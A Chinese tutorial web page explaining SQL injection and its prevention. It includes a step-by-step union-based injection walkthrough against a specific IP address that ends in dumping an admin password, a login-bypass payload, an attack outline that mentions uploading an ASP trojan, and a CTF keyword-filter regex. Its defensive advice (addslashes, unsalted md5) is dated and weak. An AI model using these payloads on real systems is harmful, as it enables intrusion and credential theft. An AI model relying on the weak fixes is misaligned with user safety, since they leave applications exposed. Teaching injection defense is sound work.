下载鸥 > 网站下载 > 开发教程 > Mysql数据库

什么是SQL注入?如何防注入?

374 2021-02-02 21:53:52

收藏
1、什么是SQL

简言之,SQL是一种结构化查询语言,使我们有能力访问和操作数据库。SQL 语句用于取回和更新数据库中的数据,可与数据库程序协同工作,比如 MS SQL Server、MS Access、Informix、DB2、Sybase 、Oracle以及其他数据库系统。

一般来说,我们会用SQL做:创建新数据库、更新数据库中的数据、面向数据库执行查询、从数据库取回数据、从数据库删除记录、在数据库中插入新的记录、在数据库中创建存储过程、在数据库中创建新表、设置表、存储过程和视图的权限,甚至能够在数据库中创建视图。


2、SQL注入常用方法

一些黑客便利用SQL的这个特性,试图侵入数据库来控制目标主机或从中获得想要的资料。

他们将Web页面的表单域、原URL或数据包输入的参数修改拼接成SQL语句传递给Web服务器,由此传给数据库服务器以执行数据库命令。如果Web应用程序的开发人员不验证或过滤用户所输入的Cookie和数据内容就直接传输给数据库就可能导致这段SQL命令被执行,从而获取数据库权限。


3、SQL注入原理

假如以上这个介绍并不足以支持你了解整个SQL注入的过程,那么接下来你就能了解黑客是利用SQL、通过哪种方式来进入目标服务器的数据库从而进行控制的。

首先,SQL注入能使黑客绕过认证机制,远程进入目标服务器中的数据库从而控制它。

目前,大多数Web应用都使用SQL数据库来存放程序数据,而几乎所有的Web应用在后台都使用某种SQL数据库。

和大多数语言一样,SQL语法允许数据库命令和用户数据混杂在一起;通常黑客们会访问有SQL注入漏洞的网站,寻找注入点;在找到漏洞之后,构造语句注入程序中,与程序里的SQL语句结合生成新的SQL语句;紧接着新的SQL语句被提交到新数据库中进行处理,数据库执行此段SQL语句后引发SQL注入攻击。


4、SQL注入的两种形式

一是直接将代码插入到与SQL命令串联在一起并使得其以执行的用户输入变量。由于其直接与SQL语句捆绑,故也被称为直接注入式攻击法;

二是一种间接的攻击方法,它将恶意代码注入要在表中存储或者作为原数据存储的字符串。在存储的字符串中会连接到一个动态的SQL命令中,以执行一些恶意的SQL代码。注入过程的工作方式是提前终止文本字符串,然后追加一个新的命令。

以直接将代码插入到SQL命令串的攻击方式为例,在输入用户访问数据的时候,先用一个分号结束当前的语句,然后再插入一个恶意SQL语句即可。由于插入的命令可能在执行前追加其他字符串,因此攻击者常常用注释标记"一"来终止注入的字符串;执行时,系统会将此文本理解为语句注释,因此不执行编译后续文本。


5、导致SQL注入的原因

1、 再精致的网页都存在漏洞,而动态网页以及脚本编程学起来比较容易,这就相对导致了很多经验水平不够的程序员做动态网站,编写的代码存在一些漏洞,这些漏洞为攻击者提供了捷径。

2、程序或系统对用户输入的参数不进行检查和过滤,没有对用户输入数据的合法性进行判断,或者程序中本身的变量处理不当,使应用程序存在安全隐患。

3、因为 SQL 注入是从正常的 www端口访问,主要是针对 web 应用程序提交数据库查询请求的攻击,与正常的用户访问没有什么区别,所以能够轻易地绕过防火墙直接访问数据库,甚至能够获得数据库所在的服务器的访问权限。

或者说,正因为SQL注入的成本低,因此企业常常会对自己的网站和后台数据库被轻而易举地入侵而烦恼,这也成为了云WAF、高防IP不同于高防服务器的特殊之处,也是高防IP价格比较昂贵的原因:能够防止网页篡改,抵御Web攻击。


6、SQL注入攻击与防御
在 http://120.203.13.75:6815/?id=1 目标站点页面发现了?id,说明可以通过查询id=1的内容来获得页面。

查询语句

select * from [表名] where id = '1';

在http://120.203.13.75:6815/?id=1 后加入一个 单引号,构成http://120.203.13.75:6815/?id=1',此时的 SQL 查询语句变为select * from 表名 where id =1';此时SQL 语句未正确结束,因此返回了一个错误页面:

继续测试

and 1=1 和 and 1=2:http://120.203.13.75:6815/?id=1 and 1=1

这相当于SQL查询语句select * from 表名 where id =1 and 1=1;

SQL 语句用 and 连接可以设置多个条件,目前返回一个永久为真的条件,因此返回了一个正常页面:

http://120.203.13.75:6815/?id=1 and 1=2,相当于SQL查询语句

select select * from 表名 where id =1 and 1=2;

SQL语句用 and 连接可以设置多个条件,目前返回一个永久为假的条件,因此页面返回错误:

说明 SQL 语句被执行,程序没有对敏感字符进行过滤。

现在可以确定此处是一个 SQL 注入点,程序对带入的参数没有做任何处理,直接带到数据库的查询语句中。

现在判断数据库类型以及版本,构造语句:发现返回正常页面,说明数据库是 MySQL,并且版本支持Union查询且大于4.0,反之则为4.0以下版本或者其他类型数据库。

http://120.203.13.75:6815/?id=1 and ord(mid(version(),1,1))>51

http://120.203.13.75:6815/?id=1 order by 10相当于SQL查询语句select * from [表名] where id =1 order by 10;

跳转错误,说明字段小于10


输入SQL查询语句select * from [表名] where id =1 order by 2;返回正常页面,说明字段为2。

确定字段之后,现在要构造联合查询语句 (union select)http://120.203.13.75:6815/?id=1 and 1=2 union select 1,2

可以发现在页面中,原先的内容没有了,取而代之的是返回的数字 2,这个数字指的是我们可以把联合查询的对应位置替换为想要查询的关键字,比如版本,数据库名称,主要是用来探测 web 系统的信息。

查询数据库版本http://120.203.13.75:6815/?id=1 and 1=2 union select 1,version() ,得到结果为版本号 5.5.53:

现在把 2 替换掉,先查询数据库名称,构造http://120.203.13.75:6815/?id=1 and 1=2 union select 1,database()语句,浏览器跳转返回就能够说明这个网站的数据库名称了;此时再用同样的手法查询表名,当浏览器返回admin时,说明表名为admin:

猜测密码字段,构造

http://120.203.13.75:6815/?id=1 and 1=2 union select 1,password from admin

语句,

返回成功,说明密码字段名称为Password、登录密码为hellohack。
 

进行 SQL注入时一般会采取手工注入或者工具注入两种方法,其总体思路是∶

(1) 扫描目标网络信息(判断是否存在SQL注入漏洞);

(2) 判断后台数据库类型;

(3) 找到Web虚拟目录;

(4) 上传ASP木马;

(5) 获取管理员权限。

以下是一段普普通通的登录演示代码,该脚本需要Username和Password两个参数,该脚本中SQL语句没有任何过滤,注入起来非常容易:

针对上面的代码进行SQL注入,在表单中username的输入框中输入'or 1=1--,这样的话,SQL语句就变成了select * from users where username=''or''=' and password=''or''='' limit 1。除了这条Payload之外,还有很多其他的Payload可用。

上述代码在进行查询时同时查询了Username和Password,查询时用户能操作的参数越多、不确定性就越大。可以换一种思路,查询时拼接的字符串只用到主键Username,后面再检查Password和数据库中的是否一致。即可以调整查询的结构,减少用户可控的参数拼接。

数据库中密码明文不太好,顺便用md5处理一下,加可以防止数据库被黑导致敏感信息泄漏。

这样做的话如果继续用username='or''='显然是不可以了,除非你知道数据库中第一个用户的密码。但是毕竟还是可以破解,因此可以在借助过滤函数来帮忙。

在这个例子中,由于Username参数两侧是单引号,如果构造SQL注入一定需要加入额外的单引号来破坏原语句,所以可以直接借助addslashes()函数将Username中的单引号转义。

$username = addslashes($_POST['username']);
$password = md5($_POST['password']);

在这个最简单的例子中,经过这样简单的修改似乎已经没有办法注入了。

之前提到了过滤函数,用到的是PHP自带的转义函数,但是这个有时候是不够用的,这种情况下可以自定义过滤函数:常见的过滤手段就是限制关键字,通过正则实现。

以下是节选的某CTF赛题中的一段代码,CTF中经常使用留有余地的过滤函数,让选手可以进行SQL注入。

该段代码中限制了select,insert等很多关键字,对防止SQL注入有一定效果但有缺陷,如果考虑的不太全还是会被注入,过滤函数设置的对关键词过于敏感会让很多正常信息的查询也变得不易。

$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';


SQL注入总结:
SQL注入是相当高发的网络安全事故点,了解SQL注入原理与防护,才能让我们创建更好的站点。

本文地址:https://xzo.com.cn/develop/mysql/619.html

有帮助,很赞!

信息来源:下载鸥
导出教程 下载word版教程
发表评论 共有条评论
关于Mysql数据库


MySQL是一款安全、跨平台、高效的,并与 PHP、Java 等主流编程语言紧密结合的数据库系统。该数据库系统是由瑞典的 MySQL AB 公司开发、发布并支持,由 MySQL 的初始开发人员 David Axmark 和 Michael Monty Widenius 于 1995 年建立的。

推荐Mysql数据库开发教程
什么是SQL注入?如何防注入?
什么是SQL注入?如何防注入?

简言之,SQL是一种结构化查询语言,使我们有能力访问和操作数据库。一些黑客便...

9 373
怎样让Mysql支持emoji和符号表情?
怎样让Mysql支持emoji和符号表情?

emoji表情在当下已经十分流行,微信名中使用了emoji表情包的也大有人在。我们...

16 651
怎样用phpMyAdmin批量导入Excel内容到MySQL数据库?
怎样用phpMyAdmin批量导入Excel内容到MySQL数据库?

近期,有客户需要将excel数据导入到MySQL数据库,这是一个比较常用的功能,操作起...

12 499
MySQL索引介绍
MySQL索引介绍

MySQL索引的建立对于MySQL的高效运行是很重要的,索引可以大大提高MySQL的检...

29 500
MySQL怎样通过身份证号码计算用户年龄?
MySQL怎样通过身份证号码计算用户年龄?

实名制站点往往需要用到身份证号码,有了身份证号码就需要获取用户年纪或做展...

1 422
MySQL数据库误删除了要怎么恢复?
MySQL数据库误删除了要怎么恢复?

MySQL误删除这种事出现的概率不高,但如果哪天误删除了,总不能真的跑路吧?那么,M...

0 318
MySQL查找字符串FIND_IN_SET()函数介绍
MySQL查找字符串FIND_IN_SET()函数介绍

FIND_IN_SET()是一个MySQL函数,通过使用本函数,我们可以返回指定字符串在以逗...

0 238
textarea带换行存入mysql数据库的方案(php/js)
textarea带换行存入mysql数据库的方案(php/js)

textarea输入框如果带有换行符,在存入数据库时需要将换行符\n转换为<br>,在...

0 376
随机Mysql数据库开发教程
MySQL数据库命令行删除重复id只保留一个
MySQL数据库命令行删除重复id只保留一个

MySQL数据库操作,当前存在两条相同ID相同内容的情况下,需要删除其中一个id,只...

11 872
MySQL处理百万级数据怎样优化?(总结篇)
MySQL处理百万级数据怎样优化?(总结篇)

要MySQL流畅支持百万级数据库,细节性的开发要点、查询条件一定要注意。本文...

16 586
MySQL处理百万级数据怎样优化?(语句篇)
MySQL处理百万级数据怎样优化?(语句篇)

MySQL作为常用数据库之一,大多数人接触到的可能是几千几万最多几十万条数据,...

1 580
MySQL怎样获取字符串长度
MySQL怎样获取字符串长度

在实际建站过程中,我们可能需要获取元素长度作为判断依据执行下一步的命令。...

8 861
mysql中过滤掉字符串中前面的数字或者后面的数字的方法
mysql中过滤掉字符串中前面的数字或者后面的数字的方法

在数据操作的过程中,因为站点的不同可能会有各种各样的需求。如过滤数字。​...

0 656
linux怎样通过命令行创建数据库、用户名及密码
linux怎样通过命令行创建数据库、用户名及密码

linux系统创建数据库及账号密码是常用操作,在这里做一个简单的介绍。登录lin...

1 766
Windows服务器怎样备份mysql数据库?
Windows服务器怎样备份mysql数据库?

近期有客户找鸥哥说windows服务器的网站要搬家到linux服务器,本来是一件小事...

14 742
SQL批量替换字段字符语句
SQL批量替换字段字符语句

最近优化网站结构遇到的问题,分享给大家。要求是需要把内容字段的H4标签用SQ...

7 271
客服QQ:341553759
点击咨询 常见问题 >
官方交流群:90432500
点击加入